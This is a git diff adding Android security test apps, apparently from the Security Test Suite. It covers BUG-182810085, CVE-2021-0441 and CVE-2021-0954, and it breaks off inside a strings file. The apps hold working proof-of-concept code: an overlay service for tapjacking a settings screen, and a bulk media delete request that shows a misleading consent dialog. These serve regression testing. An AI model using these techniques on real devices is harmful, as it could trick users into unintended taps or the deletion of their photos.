diff --git a/hostsidetests/securitybulletin/test-apps/BUG-182810085/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/BUG-182810085/res/layout/activity_main.xml
new file mode 100644
index 00000000000..0ac0cf489f4
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/BUG-182810085/res/layout/activity_main.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<RelativeLayout
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ xmlns:tools="http://schemas.android.com/tools"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ android:gravity="left"
+ tools:context=".MainActivity" >
+
+ <LinearLayout
+ android:id="@+id/linearLayout1"
+ android:layout_width="fill_parent"
+ android:layout_height="wrap_content"
+ android:layout_below="@+id/seekShowTimes"
+ android:layout_centerHorizontal="true"
+ android:layout_marginTop="53dp"
+ android:orientation="horizontal" >
+
+ <Button
+ android:id="@+id/btnStart"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:text="Start" />
+
+ </LinearLayout>
+
+</RelativeLayout>
diff --git a/hostsidetests/securitybulletin/test-apps/BUG-182810085/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/BUG-182810085/res/values/strings.xml
new file mode 100644
index 00000000000..347c9e1dec7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/BUG-182810085/res/values/strings.xml
@@ -0,0 +1,19 @@
+<!--
+ ~ Copyright (C) 2021 The Android Open Source Project
+ ~
+ ~ Licensed under the Apache License, Version 2.0 (the "License");
+ ~ you may not use this file except in compliance with the License.
+ ~ You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing, software
+ ~ distributed under the License is distributed on an "AS IS" BASIS,
+ ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ ~ See the License for the specific language governing permissions and
+ ~ limitations under the License.
+ -->
+
+<resources>
+ <string name="tapjacking_text">BUG_182810085 overlay text</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/BUG-182810085/src/android/security/cts/BUG_182810085/Constants.java b/hostsidetests/securitybulletin/test-apps/BUG-182810085/src/android/security/cts/BUG_182810085/Constants.java
new file mode 100644
index 00000000000..d7b940e99eb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/BUG-182810085/src/android/security/cts/BUG_182810085/Constants.java
@@ -0,0 +1,25 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.BUG_182810085;
+
+final class Constants {
+
+ public static final String LOG_TAG = "BUG-182810085";
+ public static final String TEST_APP_PACKAGE = Constants.class.getPackage().getName();
+
+ public static final String ACTION_START_TAPJACKING = "BUG_182810085.start_tapjacking";
+}
diff --git a/hostsidetests/securitybulletin/test-apps/BUG-182810085/src/android/security/cts/BUG_182810085/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/BUG-182810085/src/android/security/cts/BUG_182810085/DeviceTest.java
new file mode 100644
index 00000000000..4dbe976cdb0
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/BUG-182810085/src/android/security/cts/BUG_182810085/DeviceTest.java
@@ -0,0 +1,122 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.BUG_182810085;
+
+import static android.security.cts.BUG_182810085.Constants.LOG_TAG;
+
+import org.junit.Before;
+import org.junit.After;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.util.Log;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import static org.junit.Assert.assertEquals;
+import static org.junit.Assert.assertNull;
+import static org.junit.Assert.assertNotNull;
+
+/** Basic sample for unbundled UiAutomator. */
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ private static final long WAIT_FOR_UI_TIMEOUT = 20_000;
+
+ private Context mContext;
+ private UiDevice mDevice;
+
+ @Before
+ public void setUp() throws Exception {
+ Log.d(LOG_TAG, "startMainActivityFromHomeScreen()");
+
+ mContext = getApplicationContext();
+
+ // If the permission is not granted, the app will not be able to show an overlay dialog.
+ // This is required for the test below.
+ // NOTE: The permission is granted by the HostJUnit4Test implementation and should not fail.
+ assertEquals("Permission SYSTEM_ALERT_WINDOW not granted!",
+ mContext.checkSelfPermission("android.permission.SYSTEM_ALERT_WINDOW"),
+ PackageManager.PERMISSION_GRANTED);
+
+ // Initialize UiDevice instance
+ mDevice = UiDevice.getInstance(getInstrumentation());
+ if (!mDevice.isScreenOn()) {
+ mDevice.wakeUp();
+ }
+ mDevice.pressHome();
+ }
+
+ @Test
+ public void testTapjacking() throws InterruptedException {
+ Log.d(LOG_TAG, "Starting tap-jacking test");
+
+ launchTestApp();
+
+ launchTapjackedActivity();
+
+ mContext.sendBroadcast(new Intent(Constants.ACTION_START_TAPJACKING));
+ Log.d(LOG_TAG, "Sent intent to start tap-jacking!");
+
+ UiObject2 overlay = waitForView(By.text(mContext.getString(R.string.tapjacking_text)));
+ assertNull("Tap-jacking successful. Overlay was displayed.!", overlay);
+ }
+
+ @After
+ public void tearDown() {
+ mDevice.pressHome();
+ }
+
+ private void launchTestApp() {
+ Intent intent = mContext.getPackageManager().getLaunchIntentForPackage(
+ Constants.TEST_APP_PACKAGE);
+ intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK);
+ mContext.startActivity(intent);
+
+ // Wait for the app to appear
+ UiObject2 view = waitForView(By.pkg(Constants.TEST_APP_PACKAGE).depth(0));
+ assertNotNull("test-app did not appear!", view);
+ Log.d(LOG_TAG, "test-app appeared");
+ }
+
+ private void launchTapjackedActivity() {
+ Intent intent = new Intent();
+ intent.setAction("android.settings.BLUETOOTH_SETTINGS");
+ intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK | Intent.FLAG_ACTIVITY_NEW_TASK);
+ mContext.startActivity(intent);
+
+ UiObject2 activityInstance = waitForView(By.pkg("com.android.car.settings").depth(0));
+ assertNotNull("Activity under-test was not launched or found!", activityInstance);
+
+ Log.d(LOG_TAG, "Started Activity under-test.");
+ }
+
+ private UiObject2 waitForView(BySelector selector) {
+ return mDevice.wait(Until.findObject(selector), WAIT_FOR_UI_TIMEOUT);
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/BUG-182810085/src/android/security/cts/BUG_182810085/MainActivity.java b/hostsidetests/securitybulletin/test-apps/BUG-182810085/src/android/security/cts/BUG_182810085/MainActivity.java
new file mode 100644
index 00000000000..b31e83bddcb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/BUG-182810085/src/android/security/cts/BUG_182810085/MainActivity.java
@@ -0,0 +1,85 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.security.cts.BUG_182810085;
+
+import static android.security.cts.BUG_182810085.Constants.LOG_TAG;
+
+import android.app.AlertDialog;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.os.Bundle;
+import android.os.Handler;
+import android.os.Looper;
+import android.util.Log;
+import android.view.Gravity;
+import android.view.WindowManager.LayoutParams;
+import android.widget.Button;
+import android.widget.ImageView;
+import android.widget.SeekBar;
+import android.widget.Toast;
+
+import androidx.annotation.Nullable;
+import androidx.appcompat.app.AppCompatActivity;
+
+import java.util.ArrayList;
+
+/** Main activity for the test-app. */
+public final class MainActivity extends AppCompatActivity {
+
+ private final BroadcastReceiver mReceiver = new BroadcastReceiver() {
+ public void onReceive(Context context, Intent intent) {
+ startTapjacking();
+ }
+ };
+
+ private Button btnStart;
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ setContentView(R.layout.activity_main);
+
+ registerReceiver(mReceiver, new IntentFilter(Constants.ACTION_START_TAPJACKING));
+
+ btnStart = (Button) findViewById(R.id.btnStart);
+ btnStart.setOnClickListener(v -> startTapjacking());
+ }
+
+ @Override
+ protected void onDestroy() {
+ super.onDestroy();
+ unregisterReceiver(mReceiver);
+ stopOverlayService();
+ }
+
+ public void startTapjacking() {
+ Log.d(LOG_TAG, "Starting tap-jacking flow.");
+ stopOverlayService();
+
+ startOverlayService();
+ Log.d(LOG_TAG, "Started overlay-service.");
+ }
+
+ private void startOverlayService() {
+ startService(new Intent(getApplicationContext(), OverlayService.class));
+ }
+
+ private void stopOverlayService() {
+ stopService(new Intent(getApplicationContext(), OverlayService.class));
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/BUG-182810085/src/android/security/cts/BUG_182810085/OverlayService.java b/hostsidetests/securitybulletin/test-apps/BUG-182810085/src/android/security/cts/BUG_182810085/OverlayService.java
new file mode 100644
index 00000000000..0c62a80ca46
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/BUG-182810085/src/android/security/cts/BUG_182810085/OverlayService.java
@@ -0,0 +1,95 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.BUG_182810085;
+
+import android.app.Service;
+import android.content.Intent;
+import android.content.res.Resources;
+import android.graphics.PixelFormat;
+import android.os.Handler;
+import android.os.IBinder;
+import android.os.Looper;
+import android.provider.Settings;
+import android.util.DisplayMetrics;
+import android.util.Log;
+import android.view.Gravity;
+import android.view.WindowManager;
+import android.widget.Button;
+
+/** Service that starts the overlay for the test. */
+public final class OverlayService extends Service {
+ public Button mButton;
+ private WindowManager mWindowManager;
+ private WindowManager.LayoutParams mLayoutParams;
+
+ @Override
+ public void onCreate() {
+ Log.d(Constants.LOG_TAG, "onCreate() called");
+ super.onCreate();
+
+ DisplayMetrics displayMetrics = Resources.getSystem().getDisplayMetrics();
+ int scaledWidth = (int) (displayMetrics.widthPixels * 0.9);
+ int scaledHeight = (int) (displayMetrics.heightPixels * 0.9);
+
+ mWindowManager = getSystemService(WindowManager.class);
+ mLayoutParams = new WindowManager.LayoutParams();
+ mLayoutParams.type = WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY;
+ mLayoutParams.flags = WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL
+ | WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE;
+ mLayoutParams.format = PixelFormat.OPAQUE;
+ mLayoutParams.gravity = Gravity.CENTER;
+ mLayoutParams.width = scaledWidth;
+ mLayoutParams.height = scaledHeight;
+ mLayoutParams.x = scaledWidth / 2;
+ mLayoutParams.y = scaledHeight / 2;
+ }
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return null;
+ }
+
+ @Override
+ public int onStartCommand(Intent intent, int flags, int startId) {
+ Log.d(Constants.LOG_TAG, "onStartCommand() called");
+ showFloatingWindow();
+ return super.onStartCommand(intent, flags, startId);
+ }
+
+ @Override
+ public void onDestroy() {
+ Log.d(Constants.LOG_TAG, "onDestroy() called");
+ if (mWindowManager != null && mButton != null) {
+ mWindowManager.removeView(mButton);
+ }
+ super.onDestroy();
+ }
+
+ private void showFloatingWindow() {
+ if (!Settings.canDrawOverlays(this)) {
+ Log.w(Constants.LOG_TAG, "Cannot show overlay window. Permission denied");
+ }
+
+ mButton = new Button(getApplicationContext());
+ mButton.setText(getResources().getString(R.string.tapjacking_text));
+ mButton.setTag(mButton.getVisibility());
+ mWindowManager.addView(mButton, mLayoutParams);
+
+ new Handler(Looper.myLooper()).postDelayed(this::stopSelf, 60_000);
+ Log.d(Constants.LOG_TAG, "Floating window created");
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/Android.bp
new file mode 100644
index 00000000000..f07b5cc421e
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2021-0441",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/AndroidManifest.xml
new file mode 100644
index 00000000000..66451bd556b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/AndroidManifest.xml
@@ -0,0 +1,35 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2021_0441"
+ android:versionCode="1"
+ android:versionName="1.0">
+ <application
+ android:allowBackup="true"
+ android:label="@string/app_name"
+ android:supportsRtl="true">
+ <activity android:name=".PocActivity" android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+ </application>
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2021_0441" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/res/layout/activity_main.xml
new file mode 100644
index 00000000000..7460b96ae6b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/res/layout/activity_main.xml
@@ -0,0 +1,26 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<LinearLayout
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:orientation="vertical"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent">
+ <View
+ android:id="@+id/drawableview"
+ android:layout_width="match_parent"
+ android:layout_height="300dp" />
+</LinearLayout>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/res/values/integers.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/res/values/integers.xml
new file mode 100644
index 00000000000..3496d8a778f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/res/values/integers.xml
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ -->
+
+<resources>
+ <integer name="pictures">200</integer>
+ <integer name="request_code">1</integer>
+ <integer name="wait_time_ms">10000</integer>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/res/values/strings.xml
new file mode 100644
index 00000000000..9d8dd1b4319
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/res/values/strings.xml
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<resources>
+ <string name="app_name">
+ CVE-2021-0441
+ </string>
+ <string name="ui_id_alert">
+ android:id/alertTitle
+ </string>
+ <string name="ui_id_message">
+ android:id/message
+ </string>
+ <string name="path">
+ content://media/external_primary/images/media/
+ </string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/src/android/security/cts/CVE_2021_0441/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/src/android/security/cts/CVE_2021_0441/DeviceTest.java
new file mode 100644
index 00000000000..1d9c47b7acf
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/src/android/security/cts/CVE_2021_0441/DeviceTest.java
@@ -0,0 +1,101 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0441;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+import static org.junit.Assume.assumeFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+import static org.junit.Assert.fail;
+
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+
+import androidx.annotation.IntegerRes;
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import java.util.List;
+import java.util.regex.Pattern;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ Context mAppContext;
+
+ int getInteger(@IntegerRes int resId) {
+ return mAppContext.getResources().getInteger(resId);
+ }
+
+ String getString(@IntegerRes int resId) {
+ return mAppContext.getResources().getString(resId);
+ }
+
+ @Test
+ public void testCVE_2021_0441() {
+ try {
+ UiDevice device = UiDevice.getInstance(getInstrumentation());
+ mAppContext = getApplicationContext();
+ PackageManager packageManager = mAppContext.getPackageManager();
+ String packageName = mAppContext.getPackageName();
+ final Intent intent = packageManager.getLaunchIntentForPackage(packageName);
+ intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK);
+ mAppContext.startActivity(intent);
+
+ // Selecting all visible objects with res-id: android:id/alertTitle
+ Pattern patternAlert = Pattern.compile(getString(R.string.ui_id_alert));
+ BySelector selectorAlert = By.res(patternAlert);
+
+ // Selecting all visible objects with res-id: android:id/message
+ Pattern patternMessage = Pattern.compile(getString(R.string.ui_id_message));
+ BySelector selectorMessage = By.res(patternMessage);
+
+ boolean isAlertTitleVisible =
+ device.wait(Until.hasObject(selectorAlert), getInteger(R.integer.wait_time_ms));
+ boolean isMessageVisible = device.wait(Until.hasObject(selectorMessage),
+ getInteger(R.integer.wait_time_ms));
+ assumeTrue(isAlertTitleVisible || isMessageVisible);
+
+ List<UiObject2> objectsAlertTitle = device.findObjects(selectorAlert);
+ List<UiObject2> objectsMessage = device.findObjects(selectorMessage);
+ assumeFalse(objectsAlertTitle.isEmpty() && objectsMessage.isEmpty());
+
+ if (!objectsAlertTitle.isEmpty() && objectsMessage.isEmpty()) {
+ for (UiObject2 obj : objectsAlertTitle) {
+ String text = obj.getText();
+ if (text == null) {
+ continue;
+ }
+ if (text.contains(getString(R.string.app_name))
+ && text.contains(Integer.toString(getInteger(R.integer.pictures)))) {
+ fail("Vulnerable to b/174495520 !!");
+ }
+ }
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/src/android/security/cts/CVE_2021_0441/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/src/android/security/cts/CVE_2021_0441/PocActivity.java
new file mode 100644
index 00000000000..7c8b8fe71f9
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0441/src/android/security/cts/CVE_2021_0441/PocActivity.java
@@ -0,0 +1,55 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0441;
+
+import android.app.Activity;
+import android.app.PendingIntent;
+import android.content.IntentSender;
+import android.net.Uri;
+import android.os.Bundle;
+import android.provider.MediaStore;
+
+import java.util.ArrayList;
+import java.util.List;
+
+public class PocActivity extends Activity {
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ setContentView(R.layout.activity_main);
+ requestDeletePermission(getUriList(getResources().getInteger(R.integer.pictures)));
+ }
+
+ ArrayList<Uri> getUriList(int capacity) {
+ ArrayList<Uri> list = new ArrayList<Uri>();
+ for (int i = 0; i < capacity; ++i) {
+ Uri uri = Uri.parse(getString(R.string.path) + i);
+ list.add(uri);
+ }
+ return list;
+ }
+
+ private void requestDeletePermission(List<Uri> uriList) {
+ PendingIntent pi = MediaStore.createDeleteRequest(getContentResolver(), uriList);
+ try {
+ startIntentSenderForResult(pi.getIntentSender(),
+ getResources().getInteger(R.integer.request_code), null, 0, 0, 0);
+ } catch (IntentSender.SendIntentException e) {
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/Android.bp
index aa9f71f574b..59350cf546f 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/Android.bp
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/Android.bp
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2021 The Android Open Source Project
+ * Copyright (C) 2022 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -18,10 +18,10 @@
android_test_helper_app {
name: "CVE-2021-0954",
defaults: ["cts_support_defaults"],
- srcs: ["src/**/*.java"],
+ srcs: [
+ "src/**/*.java"
+ ],
test_suites: [
- "cts",
- "vts10",
"sts",
],
static_libs: [
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/AndroidManifest.xml
index a7e0218c422..75299c4ddfe 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/AndroidManifest.xml
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/AndroidManifest.xml
@@ -1,5 +1,5 @@
<!--
- Copyright 2021 The Android Open Source Project
+ Copyright 2022 The Android Open Source Project
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
@@ -13,25 +13,19 @@
See the License for the specific language governing permissions and
limitations under the License.
-->
+
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
- package="android.security.cts.cve_2021_0954"
+ package="android.security.cts.CVE_2021_0954"
android:versionCode="1"
android:versionName="1.0">
-
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
-
- <application
- android:allowBackup="true"
- android:label="CVE_2021_0954"
- android:supportsRtl="true">
- <uses-library android:name="android.test.runner" />
+ <application>
<service android:name=".PocService"
android:enabled="true"
- android:exported="false" />
+ android:exported="true" />
</application>
-
<instrumentation
android:name="androidx.test.runner.AndroidJUnitRunner"
- android:targetPackage="android.security.cts.cve_2021_0954" />
+ android:targetPackage="android.security.cts.CVE_2021_0954" />
</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/res/values/integers.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/res/values/integers.xml
new file mode 100644
index 00000000000..363df0001d7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/res/values/integers.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <integer name="assumptionFailure">-1</integer>
+ <integer name="noAssumptionFailure">0</integer>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/res/values/strings.xml
new file mode 100644
index 00000000000..7c4d959b70f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/res/values/strings.xml
@@ -0,0 +1,38 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright (C) 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<resources>
+ <string name="canNotDrawOverlaysMsg">The application cannot draw overlays</string>
+ <string name="defaultSemaphoreMsg">Could not get message key in shared preferences</string>
+ <string name="cmdDumpsysActivity">dumpsys activity %1$s</string>
+ <string name="empty"></string>
+ <string name="overlayErrorMessage">Device is vulnerable to b/143559931 hence any app with
